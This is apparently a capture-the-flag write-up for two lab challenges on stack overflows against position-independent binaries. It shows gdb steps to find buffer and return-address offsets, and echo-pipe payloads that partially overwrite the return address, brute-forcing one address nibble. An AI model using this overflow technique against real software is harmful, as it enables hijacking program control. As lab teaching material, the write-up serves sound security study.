PIEs

PIEs (easy)

1. GDB -> disas win_authed -> the address of instruction after auth check is 0x237e

2. As told in the debug output, the return address from challenge() is stored at 104 bytes from start of input buffer.

   shell echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x7e\x23" | /challenge/binary-exploitation-pie-overflow-w

we need to write two bytes, then one of those nibbles (the fourth least-significant one) will be a guess, and it will be incorrect 15 of 16 times. This is okay: we can just run our exploit a few times until it works (statistically, ~50% chance after 11 times and ~90% chance after 36 times)

PIEs (hard)

1. In gdb, disas win_authed and disas main, we get to know:

   • Instruction after auth check is at 0x174c
   • challenge() returns at 0x19b9

2. Set a breakpoint b *challenge+158, run and give a short string of a's as input

3. info frame -> rbp is at 0x7ffdcf51c100
4. x/100xg $rbp-200:
   • input buffer starts at 0x7ffdcf51c0b0, which is rbp-0x50 = rbp-80
   • return address is stored at 0x7fffd6cd0ed8, which is rbp+0x8 = rbp+8

5. 88 a's followed by desired two bytes (one of the 4 nibbles is a guess, so have to run the exploit a few times):

   shell echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x4c\x17" | /challenge/binary-exploitation-pie-overflow